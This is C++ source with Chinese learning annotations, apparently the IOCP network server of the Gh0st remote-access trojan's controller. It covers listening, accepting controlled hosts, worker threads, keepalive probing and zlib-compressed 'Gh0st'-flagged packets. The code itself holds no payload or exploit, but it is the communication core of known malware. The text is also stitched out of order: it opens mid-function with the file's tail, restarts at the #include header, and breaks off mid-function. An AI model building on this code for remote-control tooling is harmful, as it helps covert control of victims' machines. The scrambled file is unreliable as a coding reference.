//由于dwIOSize的值为0,因此接下来的那个判断语句if代码块永远不会被执行
ULONG ulFlags = MSG_PARTIAL;
// Finished writing - tidy up
pContext->m_WriteBuffer.Delete(dwIoSize);
if (pContext->m_WriteBuffer.GetBufferLen() == 0)
{
pContext->m_WriteBuffer.ClearBuffer();
// Write complete
SetEvent(pContext->m_hWriteComplete);
return true; // issue new read after this one
}
else
{
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_TRANSMIT);
pContext->m_wsaOutBuffer.buf = (char*) pContext->m_WriteBuffer.GetBuffer();
pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
//最后,在设置好WSASend函数的各个参数值之后,将数据直接就发送出去了,这个时候的发送情况基本上是一定能成功的,并且一般不会阻塞。除非被控端掉线
int nRetVal = WSASend(pContext->m_Socket,
&pContext->m_wsaOutBuffer,
1,
&pContext->m_wsaOutBuffer.len,
ulFlags,
&pOverlap->m_ol,
NULL);
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING )
{
RemoveStaleClient( pContext, FALSE );
}
}
}catch(...){}
return false; // issue new read after this one
}
//
// FUNCTION: CIOCPServer::CloseCompletionPort
//
// DESCRIPTION: Close down the IO Complete Port, queue and associated client context structs
// which in turn will close the sockets...
//
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::CloseCompletionPort()//当线程总数不为零时循环执行
{
while (m_nWorkerCnt)
{
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) NULL, NULL);//抛出一个特别的消息
Sleep(100);//睡眠一会
}
// Close the CompletionPort and stop any more requests相关参数赋值为空,关闭句柄
CloseHandle(m_hCompletionPort);
ClientContext* pContext = NULL;
do
{
POSITION pos = m_listContexts.GetHeadPosition();//获得索引
if (pos)
{
pContext = m_listContexts.GetNext(pos); //得到相关的结构并移除
RemoveStaleClient(pContext, FALSE);
}
}
while (!m_listContexts.IsEmpty());//这个列表不为空时运行
m_listContexts.RemoveAll();//移除所有链表
}
/*实现完成端口与套接字的绑定,并返回完成端口*/
BOOL CIOCPServer::AssociateSocketWithCompletionPort(SOCKET socket, HANDLE hCompletionPort, DWORD dwCompletionKey)
{
HANDLE h = CreateIoCompletionPort((HANDLE) socket, hCompletionPort, dwCompletionKey, 0);
return h == hCompletionPort;
}
//
// FUNCTION: CIOCPServer::RemoveStaleClient
//
// DESCRIPTION: Client has died on us, close socket and remove context from our list
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::RemoveStaleClient(ClientContext* pContext, BOOL bGraceful)
{
CLock cs(m_cs, "RemoveStaleClient");//线程同步
TRACE("CIOCPServer::RemoveStaleClient\n");
LINGER lingerStruct;//申明一个变量
//
// If we're supposed to abort the connection, set the linger value
// on the socket to 0.
//
/*等待套接字上的通信
如果在发送数据的过程中(send()没有完成,还有数据没发送)而调用了closesocket(),以前我们
一般采取的措施是"从容关闭"shutdown(s,SD_BOTH),但是数据是肯定丢失了,如何设置让程序满足具体
应用的要求(即让没发完的数据发送出去后在关闭socket)?
struct linger {
u_short l_onoff;
u_short l_linger;
};
linger m_sLinger;
m_sLinger.l_onoff=1;//(在closesocket()调用,但是还有数据没发送完毕的时候容许逗留)
// 如果m_sLinger.l_onoff=0;则功能和2.)作用相同;
m_sLinger.l_linger=5;//(容许逗留的时间为5秒)
setsockopt (s,SOL_SOCKET,SO_LINGER,(const char*)&m_sLinger,sizeof(linger)); */
if ( !bGraceful )
{
lingerStruct.l_onoff = 1;
lingerStruct.l_linger = 0;
setsockopt( pContext->m_Socket, SOL_SOCKET, SO_LINGER,
(char *)&lingerStruct, sizeof(lingerStruct) );
}
//
// Free context structures
//查找连接链表里与这个指针所指向的相同结构
if (m_listContexts.Find(pContext))
{
//
// Now close the socket handle. This will do an abortive or graceful close, as requested.
CancelIo((HANDLE) pContext->m_Socket);//完成此结构中套接字上悬而未决的操作
closesocket( pContext->m_Socket );
pContext->m_Socket = INVALID_SOCKET;//并置为空
while (!HasOverlappedIoCompleted((LPOVERLAPPED)pContext)) //判断是否真的所有IO操作完成了
Sleep(0);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_DISCONNECT);//调用回调函数,发送NC_CLIENT_DIS参数,此函数最终的作用就是在列表中删除与之对应的主机
MoveToFreePool(pContext);//移动到释放链表中,具体看函数
}
}
void CIOCPServer::Shutdown()
{
if (m_bInit == false)//初始化是否成功
return;
m_bInit = false;//如果成功就把相应的值置为flase
m_bTimeToKill = true;
// Stop the listener
Stop();
closesocket(m_socListen); //关闭相应的句柄和事件
WSACloseEvent(m_hEvent);
CloseCompletionPort();//关闭完成端口和删除线程同步句柄,跟进函数
DeleteCriticalSection(&m_cs);
while (!m_listFreePool.IsEmpty())//清楚释放链表
delete m_listFreePool.RemoveTail();
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Checks free pool otherwise allocates a context
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::MoveToFreePool(ClientContext *pContext)
{
CLock cs(m_cs, "MoveToFreePool");//线程同步
// Free context structures
POSITION pos = m_listContexts.Find(pContext);//查与此结构相同的索引
if (pos)
{
//调用CLearBuffer函数清空数据
pContext->m_CompressionBuffer.ClearBuffer();
pContext->m_WriteBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.ClearBuffer();
//加入到释放链表中
m_listFreePool.AddTail(pContext);
//移除索引
m_listContexts.RemoveAt(pos);
}
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Moves an 'used/stale' Context to the free pool for reuse
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
/在成功与主机进行连接后,调用此函数,返回值为指向ClinetContext结构的指针///
ClientContext* CIOCPServer::AllocateContext()
{
ClientContext* pContext = NULL;
CLock cs(CIOCPServer::m_cs, "AllocateContext");
if (!m_listFreePool.IsEmpty())//判断释放链表是否为空
{
pContext = m_listFreePool.RemoveHead();//不为空时取出一个链表
}
else
{
pContext = new ClientContext;//为空时新建一个
}
ASSERT(pContext);//断言这个不为空
if (pContext != NULL)//判断是否不为空
{
ZeroMemory(pContext, sizeof(ClientContext));//进行清零操作
pContext->m_bIsMainSocket = false;//是否是主套接的判定标示置为False
memset(pContext->m_Dialog, 0, sizeof(pContext->m_Dialog));//赋值此指针指向的结构中M_dialog数组的元素为零
}
return pContext;
}
//重新连接前需要移除他的链表,不中止SOKET连接
void CIOCPServer::ResetConnection(ClientContext* pContext)
{
CString strHost;
ClientContext* pCompContext = NULL;
CLock cs(CIOCPServer::m_cs, "ResetConnection");
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pCompContext = m_listContexts.GetNext(pos);
if (pCompContext == pContext)
{
RemoveStaleClient(pContext, TRUE);
break;
}
}
}
void CIOCPServer::DisconnectAll()
{
//把相应的变量值改变
m_bDisconnectAll = true;
CString strHost;
ClientContext* pContext = NULL;
CLock cs(CIOCPServer::m_cs, "DisconnectAll");
//移除所有连接的链表
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pContext = m_listContexts.GetNext(pos);
RemoveStaleClient(pContext, TRUE);
}
m_bDisconnectAll = false;
}
//简单返回
bool CIOCPServer::IsRunning()
{
return m_bInit;
}
//大家有什么疑问可以咨询,大家相互学习,文章中注释属于个人理解有误请指教..............................
//
//
#include "stdafx.h"
#include "IOCPServer.h"
#include "../MainFrm.h"
#include "zlib/zlib.h"
#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif
// Change at your Own Peril
// 'G' 'h' '0' 's' 't' | PacketLen | UnZipLen
#define HDR_SIZE 13
#define FLAG_SIZE 5
#define HUERISTIC_VALUE 2
CRITICAL_SECTION CIOCPServer::m_cs;
//
// Construction/Destruction
//
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: C'tor initializes Winsock2 and miscelleanous events etc.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
CIOCPServer::CIOCPServer()
{
TRACE("CIOCPServer=%p\n",this);
//
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);//初始化套接字库,版本为2.2
InitializeCriticalSection(&m_cs);//初始化临界资源
m_hThread = NULL;//监听线程句柄
m_hKillEvent = CreateEvent(NULL, TRUE, FALSE, NULL);//创建一个人工授信的事件句柄,其结束监听线程的作用
m_socListen = NULL;//监听套接字
m_bTimeToKill = false;//是否结束掉完成端口上所有的线程
m_bDisconnectAll = false;//关闭所有连接的一个哨兵
m_hEvent = NULL;//事件句柄
m_hCompletionPort= NULL;//完成端口句柄
m_bInit = false;//记录完成端口初始化是否成功
m_nCurrentThreads = 0;//为完成端口服务的工作者线程数量
m_nBusyThreads = 0;//为完成端口服务线程中当前处于工作的数量
m_nSendKbps = 0;//发送数据量
m_nRecvKbps = 0;//接受数据量
m_nMaxConnections = 10000;//最大连接数量
m_nKeepLiveTime = 1000 * 60 * 3; // 三分钟探测一次,保活机制的探测时间
// Packet Flag;
BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'}; //这里是数据发送的标记 服务端同客户端字符必须一致
memcpy(m_bPacketFlag, bPacketFlag, sizeof(bPacketFlag));//复制标示到变量中去
}
//
// FUNCTION: CIOCPServer::CIOCPServer
//
// DESCRIPTION: Tidy up
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
///析构函数中关闭完成端口,卸载套接字库的使用,跟进shutdown函数/
CIOCPServer::~CIOCPServer()
{
try
{
Shutdown();
WSACleanup();
}catch(...){}
}
//
// FUNCTION: Init
//
// DESCRIPTION: Starts listener into motion
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::Initialize(NOTIFYPROC pNotifyProc, CMainFrame* pFrame, int nMaxConnections, int nPort)
{
m_pNotifyProc = pNotifyProc;//这是将回调函数保存到自己内部变量
m_pFrame = pFrame;//保存框架指针
m_nMaxConnections = nMaxConnections;//保存最大连接数
m_socListen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED);//新建套接字
if (m_socListen == INVALID_SOCKET)//创建失败
{
TRACE(_T("Could not create listen socket %ld\n"),WSAGetLastError());
return false;
}
// Event for handling Network IO
m_hEvent = WSACreateEvent();//创建网络事件句柄
if (m_hEvent == WSA_INVALID_EVENT)//创建事件失败
{
TRACE(_T("WSACreateEvent() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
// The listener is ONLY interested in FD_ACCEPT
// That is when a client connects to or IP/Port
// Request async notification
//将一个事件对象与网络事件集合关联在一起,感兴趣的事件FD_ACCEPT,发生生网络事件时m_hEvent变为授信状态
int nRet = WSAEventSelect(m_socListen,
m_hEvent,
FD_ACCEPT);
if (nRet == SOCKET_ERROR)//关联失败
{
TRACE(_T("WSAAsyncSelect() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
SOCKADDR_IN saServer; //创建一个SOCKADDR_IN结构的对象
// Listen on our designated Port#
saServer.sin_port = htons(nPort);//赋值
// Fill in the rest of the address structure
saServer.sin_family = AF_INET;
saServer.sin_addr.s_addr = INADDR_ANY;
// bind our name to the socket
//绑定套接字
nRet = bind(m_socListen,
(LPSOCKADDR)&saServer,
sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR)//套接字绑定失败
{
TRACE(_T("bind() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
// Set the socket to listen
nRet = listen(m_socListen, SOMAXCONN);//开始监听
if (nRet == SOCKET_ERROR)//监听失败
{
TRACE(_T("listen() error %ld\n"),WSAGetLastError());
closesocket(m_socListen);//关闭套接字
return false;
}
UINT dwThreadId = 0;
//开启监听线程 跟进ListenThreadProc
//并初始化完成端口
m_hThread =
(HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ListenThreadProc, // Thread fn entry point
(void*) this,
0, // Init flag
&dwThreadId); // Thread address
if (m_hThread != INVALID_HANDLE_VALUE)//线程创建成功
{
InitializeIOCP();//初始化完成端口
m_bInit = true;//设置m_bInit变量为true
return true;
}
return false;
}
//
// FUNCTION: CIOCPServer::ListenThreadProc
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
unsigned CIOCPServer::ListenThreadProc(LPVOID lParam) //监听线程
{
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(lParam);//保存CIOCPServer指针
WSANETWORKEVENTS events;//创建WSANETWORKEVENTS结构events对象
while(1)
{
//
// Wait for something to happen
//等待m_hKillEvent事件100毫秒,如果m_hKillEvent有信号就跳出循环
if (WaitForSingleObject(pThis->m_hKillEvent, 100) == WAIT_OBJECT_0)
break;
DWORD dwRet;
//等待FD_ACCPETs网络事件通知,等待100毫秒
dwRet = WSAWaitForMultipleEvents(1,
&pThis->m_hEvent,
FALSE,
100,
FALSE);
if (dwRet == WSA_WAIT_TIMEOUT)//等待超时
continue;
//
// Figure out what happened
//检测m_socListen套接口上网络事件的发生。
int nRet = WSAEnumNetworkEvents(pThis->m_socListen,
pThis->m_hEvent,
&events);
if (nRet == SOCKET_ERROR)//失败
{
TRACE(_T("WSAEnumNetworkEvents error %ld\n"),WSAGetLastError());
break;
}
// Handle Network events //
// ACCEPT
// 判断网络事件是不是FD_ACCEPT
if (events.lNetworkEvents & FD_ACCEPT)
{
if (events.iErrorCode[FD_ACCEPT_BIT] == 0)//获取看是否有错误无错误调用OnAccept函数
pThis->OnAccept();
else
{
TRACE(_T("Unknown network event error %ld\n"),WSAGetLastError());//有错误
break;
}
}
} // while....
return 0; // Normal Thread Exit Code...
}
//
// FUNCTION: CIOCPServer::OnAccept
//
// DESCRIPTION: Listens for incoming clients
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09072001 Changes for OVERLAPPEDPLUS
void CIOCPServer::OnAccept()
{
SOCKADDR_IN SockAddr;//定义SOCKADDR_IN结构对象
SOCKET clientSocket;//定义一个clientSocket套接字
int nRet;
int nLen;
if (m_bTimeToKill || m_bDisconnectAll)//如果要结束掉完成端口上所有的线程或者断开所有连接时,此函数退出
return;
//
// accept the new socket descriptor
//检测到有主机连接时调用accept并建立与之通信的套接字
nLen = sizeof(SOCKADDR_IN);
clientSocket = accept(m_socListen,
(LPSOCKADDR)&SockAddr,
&nLen);
if (clientSocket == SOCKET_ERROR)//接收失败
{
nRet = WSAGetLastError();//获取错误代码
if (nRet != WSAEWOULDBLOCK)//不等于WSAEWOULDBLOCK真的发生错误
{
//
// Just log the error and return
//
TRACE(_T("accept() error\n"),WSAGetLastError());
return;
}
}
// Create the Client context to be associted with the completion port
//定义一个指向ClientContext结构的指针,并调用函数进行赋值,我们跟进此函数!
ClientContext* pContext = AllocateContext();
// AllocateContext fail
if (pContext == NULL)//创建失败
return;
//将连接的套接字保存在上下文中
pContext->m_Socket = clientSocket;
// Fix up In Buffer
//对结构中接收的缓冲区赋值大小为8192
pContext->m_wsaInBuffer.buf = (char*)pContext->m_byInBuffer;
pContext->m_wsaInBuffer.len = sizeof(pContext->m_byInBuffer);
// Associate the new socket with a completion port.
//判断完成端口是否绑定成功
if (!AssociateSocketWithCompletionPort(clientSocket, m_hCompletionPort, (DWORD) pContext))//关联失败
{
//失败时删除这个指针并置为空,关闭连接用的套接字。关闭监听套接字,并返回
delete pContext;
pContext = NULL;
closesocket( clientSocket );
closesocket( m_socListen );
return;
}
// 关闭nagle算法,以免影响性能,因为控制时控制端要发送很多数据量很小的数据包,要求马上发送
// 暂不关闭,实验得知能网络整体性能有很大影响
const char chOpt = 1;
// int nErr = setsockopt(pContext->m_Socket, IPPROTO_TCP, TCP_NODELAY, &chOpt, sizeof(char));
// if (nErr == -1)
// {
// TRACE(_T("setsockopt() error\n"),WSAGetLastError());
// return;
// }
// Set KeepAlive 开启保活机制
//对于 socket 非正常断开
//设置套接字的属性,并赋予它保活机制,如果设置错误获取错误代码
if (setsockopt(pContext->m_Socket, SOL_SOCKET, SO_KEEPALIVE, (char *)&chOpt, sizeof(chOpt)) != 0)//发生错误
{
TRACE(_T("setsockopt() error\n"), WSAGetLastError());
}
// 设置超时详细信息
tcp_keepalive klive;
klive.onoff = 1; // 启用保活
klive.keepalivetime = m_nKeepLiveTime; // 开始首次 KeepAlive 探测前的 TCP 空闭时间 3分钟一次
klive.keepaliveinterval = 1000 * 10; // 重试间隔为10秒 Resend if No-Reply
WSAIoctl
(
pContext->m_Socket,
SIO_KEEPALIVE_VALS,
&klive,
sizeof(tcp_keepalive),
NULL,
0,
(unsigned long *)&chOpt,
0,
NULL
);
CLock cs(m_cs, "OnAccept" );;//加入链表之前要进行共享资源访问的控制在此调用CLock类
// Hold a reference to the context
m_listContexts.AddTail(pContext);//把上下文加入上下文列表,每有一个连接就建立一个上下文并加入列表
// Trigger first IO Completion Request
// Otherwise the Worker thread will remain blocked waiting for GetQueuedCompletionStatus...
// The first message that gets queued up is ClientIoInitializing - see ThreadPoolFunc and
// IO_MESSAGE_HANDLER
//动态新建一个OVERLAPPEDPLUS结构并初始化IOType类型为IOInitialize
OVERLAPPEDPLUS *pOverlap = new OVERLAPPEDPLUS(IOInitialize);
//向一个已经初始完的I/O端口发送数据包操作类型为IOInitialize,触发GetQueuedCompletionStatus功能调用函数来取得数据包
BOOL bSuccess = PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
if ( (!bSuccess && GetLastError( ) != ERROR_IO_PENDING))//发送失败
{
RemoveStaleClient(pContext,TRUE);
return;
}
//我们看一下NC_CLIENT_CONNECT实现了什么都没做
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_CONNECT);//调用回调函数发送NC_CLINET_CONECT这个参数,跟踪得知什么都没做
// Post to WSARecv Next
PostRecv(pContext);//抛出接受的请求,跟进函数
}
//
// FUNCTION: CIOCPServer::InitializeIOCP
//
// DESCRIPTION: Create a dummy socket and associate a completion port with it.
// once completion port is create we can dicard the socket
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
bool CIOCPServer::InitializeIOCP(void)
{
//新建完成端口开始函数,准备相关参数
SOCKET s;
DWORD i;
UINT nThreadID;
SYSTEM_INFO systemInfo;
//
// First open a temporary socket that we will use to create the
// completion port. In NT 3.51 it will not be necessary to specify
// the FileHandle parameter of CreateIoCompletionPort()--it will
// be legal to specify FileHandle as NULL. However, for NT 3.5
// we need an overlapped file handle.
//
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);//新建一个SOKET
if ( s == INVALID_SOCKET )
return false;
// Create the completion port that will be used by all the worker
// threads.创建完成端口新建一个完成端口,
//这里只是新建一个完成端口可用另外一个方法:HANDLE CompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
m_hCompletionPort = CreateIoCompletionPort( (HANDLE)s, NULL, 0, 0 );
if ( m_hCompletionPort == NULL ) //创建失败,关闭SOKET
{
closesocket( s );
return false;
}
// Close the socket, we don't need it any longer.
closesocket( s );
// Determine how many processors are on the system获取CPU数量.
GetSystemInfo( &systemInfo );//获得系统信息
m_nThreadPoolMin = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;//进行相关线程的赋值,后续在根据CPU使用率调整时会用到
m_nThreadPoolMax = m_nThreadPoolMin;
m_nCPULoThreshold = 10; //设置CPU最大允许利用率和最小允许利用率
m_nCPUHiThreshold = 75;
m_cpu.Init();//初始化CPU的使用率
// We use two worker threads for eachprocessor on the system--this is choosen as a good balance
// that ensures that there are a sufficient number of threads available to get useful work done
// but not too many that context switches consume significant overhead.
//建立2倍CPU数量的工作者线程
UINT nWorkerCnt = systemInfo.dwNumberOfProcessors * HUERISTIC_VALUE;
// We need to save the Handles for Later Termination...
HANDLE hWorker;//定义工作线程句柄
m_nWorkerCnt = 0;
//建立工作者线程,线程函数为ThreadPoolfunc
for ( i = 0; i < nWorkerCnt; i++ )
{
hWorker = (HANDLE)_beginthreadex(NULL, // Security
0, // Stack size - use default
ThreadPoolFunc, // Thread fn entry point
(void*) this, // Param for thread
0, // Init flag
&nThreadID); // Thread address
if (hWorker == NULL ) //创建失败
{
CloseHandle( m_hCompletionPort );//关闭完成端口
return false;
}
m_nWorkerCnt++;//加1用于统计创建的工作者线程
CloseHandle(hWorker);//关闭句柄减少引用技术
}
return true;
}
//
// FUNCTION: CIOCPServer::ThreadPoolFunc
//
// DESCRIPTION: This is the main worker routine for the worker threads.
// Worker threads wait on a completion port for I/O to complete.
// When it completes, the worker thread processes the I/O, then either pends
// new I/O or closes the client's connection. When the service shuts
// down, other code closes the completion port which causes
// GetQueuedCompletionStatus() to wake up and the worker thread then
// exits.
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
unsigned CIOCPServer::ThreadPoolFunc (LPVOID thisContext) //工作者线程函数起始位置
{
// Get back our pointer to the class
ULONG ulFlags = MSG_PARTIAL;
CIOCPServer* pThis = reinterpret_cast<CIOCPServer*>(thisContext);//保存CIOCPServer指针到内部变量
ASSERT(pThis);
HANDLE hCompletionPort = pThis->m_hCompletionPort;//完成端口句柄赋予内部变量
DWORD dwIoSize;
LPOVERLAPPED lpOverlapped;//定义一个OVERLAPPEDPLUS结构的lpOverlapped指针
ClientContext* lpClientContext;//定义一个ClientContext的lpClientContext指针
OVERLAPPEDPLUS* pOverlapPlus;//定义一个OVERLAPPEDPLUS扩展后的pOverlapPlus指针
bool bError;
bool bEnterRead;
InterlockedIncrement(&pThis->m_nCurrentThreads);//主要用于线程同步
InterlockedIncrement(&pThis->m_nBusyThreads);
//
// Loop round and round servicing I/O completions.
// 不停地循环来处理IO
//只有在bstayinpool为flase或者m_btimetokill为true时跳出循环
for (BOOL bStayInPool = TRUE; bStayInPool && pThis->m_bTimeToKill == false; )
{
pOverlapPlus = NULL;
lpClientContext = NULL;
bError = false;
bEnterRead = false;
// Thread is Block waiting for IO completion
InterlockedDecrement(&pThis->m_nBusyThreads);//锁住
// Get a completed IO request.获取IO完成状态
BOOL bIORet = GetQueuedCompletionStatus(
hCompletionPort,
&dwIoSize,
(LPDWORD) &lpClientContext,
&lpOverlapped, INFINITE);
DWORD dwIOError = GetLastError();//获取错误代码
//指针的范围进行一个扩大,指向整个的定义结构,这样就能指向带有附加数据的整个OVERLAPPEDPLUS类型,并且根据附加的数据的m_ioType域的不同,进行不同的处理
pOverlapPlus = CONTAINING_RECORD(lpOverlapped, OVERLAPPEDPLUS, m_ol);
int nBusyThreads = InterlockedIncrement(&pThis->m_nBusyThreads);
if (!bIORet && dwIOError != WAIT_TIMEOUT )//获取状态错误或者错误代码不为WAIT_TIMEOUT时
{
if (lpClientContext && pThis->m_bTimeToKill == false)//当IPCLINETCONTEXT不为空,且M_btinetokill等于flase时进行移除链表
{
pThis->RemoveStaleClient(lpClientContext, FALSE);
}
continue;
// anyway, this was an error and we should exit有错误退出
bError = true;
}
if (!bError) // 没错误处理
{
// Allocate another thread to the thread Pool?
//这里应该就是传说中的根据CPU状态智能调整
if (nBusyThreads == pThis->m_nCurrentThreads)//如果当前工作的线程等于为完成端口服务的线程
{
if (nBusyThreads < pThis->m_nThreadPoolMax)//工作的线程小于最大的工作线程时
{
if (pThis->m_cpu.GetUsage() > pThis->m_nCPUHiThreshold)//CPU使用率大于最大允许率的时候
{
UINT nThreadID = -1;
//新建一个线程
// HANDLE hThread = (HANDLE)_beginthreadex(NULL, // Security
// 0, // Stack size - use default
// ThreadPoolFunc, // Thread fn entry point
/// (void*) pThis,
// 0, // Init flag
// &nThreadID); // Thread address
// CloseHandle(hThread);
}
}
}
// Thread timed out - IDLE?
if (!bIORet && dwIOError == WAIT_TIMEOUT)//获取状态错误或者错误代码为WAIT_TIMEOUT时
{
if (lpClientContext == NULL)//如果为空,判定是否为发来的结束线程的数据包
{
if (pThis->m_cpu.GetUsage() < pThis->m_nCPULoThreshold)//如果CPU使用率小于允许的最小使用率时
{
// Thread has no outstanding IO - Server hasn't much to do so die
if (pThis->m_nCurrentThreads > pThis->m_nThreadPoolMin)//完成端口服务的线程大于最小工作线程时
bStayInPool = FALSE;
}
bError = true;
}
}
}
//
//
if (!bError)//这里就是主要功能判断没出错参数什么都不为NULL
{
if(bIORet && NULL != pOverlapPlus && NULL != lpClientContext)
{
try
{
pThis->ProcessIOMessage(pOverlapPlus->m_ioType, lpClientContext, dwIoSize);//根据IO完成类型调用不同的函数处理
}
catch (...) {}
}
}
//不为空时进行删除
if(pOverlapPlus)
delete pOverlapPlus; // from previous call
}
InterlockedDecrement(&pThis->m_nWorkerCnt);
InterlockedDecrement(&pThis->m_nCurrentThreads);
InterlockedDecrement(&pThis->m_nBusyThreads);
return 0;
}
//
// FUNCTION: CIOCPServer::Stop
//
// DESCRIPTION: Signal the listener to quit his thread
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
void CIOCPServer::Stop()
{
::SetEvent(m_hKillEvent);
WaitForSingleObject(m_hThread, INFINITE);//一直等待m_hThread有信号
CloseHandle(m_hThread);
CloseHandle(m_hKillEvent);
}
//
// FUNCTION: CIOCPServer::GetHostName
//
// DESCRIPTION: Get the host name of the connect client
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
/获得相关连接的ip///
CString CIOCPServer::GetHostName(SOCKET socket)
{
sockaddr_in sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
int nSockAddrLen = sizeof(sockAddr);
BOOL bResult = getpeername(socket,(SOCKADDR*)&sockAddr, &nSockAddrLen);
return bResult != INVALID_SOCKET ? inet_ntoa(sockAddr.sin_addr) : "";
}
void CIOCPServer::PostRecv(ClientContext* pContext)
{
// issue a read request
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IORead);//定义相关变量
ULONG ulFlags = MSG_PARTIAL;
DWORD dwNumberOfBytesRecvd;
UINT nRetVal = WSARecv(pContext->m_Socket, //接受数据请求
&pContext->m_wsaInBuffer,
1,
&dwNumberOfBytesRecvd,
&ulFlags,
&pOverlap->m_ol,
NULL);
//如果发生错误,移除这个结构,注意第二个参数,此参数需终止此套接字上的连接
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING)
{
RemoveStaleClient(pContext, FALSE);
}
}
//
// FUNCTION: CIOCPServer::Send
//
// DESCRIPTION: Posts a Write + Data to IO CompletionPort for transfer
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///首先,待发送的数据是在参数:lpData中,而待发送的数据的大小由参数:nSize指定。/
void CIOCPServer::Send(ClientContext* pContext, LPBYTE lpData, UINT nSize)
{
if (pContext == NULL)//如果是错误的调用直接返回
return;
try
{
if (nSize > 0)
{
// Compress data
//将数据进行压缩处理。 这个地方要注意:在压缩前,
//这个值的计算公式为: unsigned long destLen = (double)nSize * 1.001 + 12;这个是固定的。因为,内存中压缩数据的时候是需要一定大小的工作空间的,因此按照这个公式计算出工作需要的空间大小,然后申请这么大小的一个内存空间作为压缩过的数据的存储空间。
unsigned long destLen = (double)nSize * 1.001 + 12;
LPBYTE pDest = new BYTE[destLen];
int nRet = compress(pDest, &destLen, lpData, nSize);//使用compress进行压缩处理:int nRet = compress(pDest, &destLen, lpData, nSize);注意这个函数执行完成之后,在参数destLen中会返回数据被压缩过之后的一个大小。
if (nRet != Z_OK)//成功与否
{
delete [] pDest;
return;
}
//
/*开始往发送缓冲区中组织欲发送的数据
LONG nBufLen = destLen + HDR_SIZE(值为13); m_WriteBuffer.Write(m_bPacketFlag, sizeof
m_bPacketFlag));
m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
m_WriteBuffer.Write(pDest, destLen);
数据包发送标记大小+整个数据包的大小+未压缩前数据包的大小+被压缩后的数据 */
LONG nBufLen = destLen + HDR_SIZE;
// 5 bytes packet flag
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
// 4 byte header [Size of Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
// 4 byte header [Size of UnCompress Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
// Write Data
pContext->m_WriteBuffer.Write(pDest, destLen);
delete [] pDest;
// 发送完后,再备份数据, 因为有可能是m_ResendWriteBuffer本身在发送,所以不直接写入
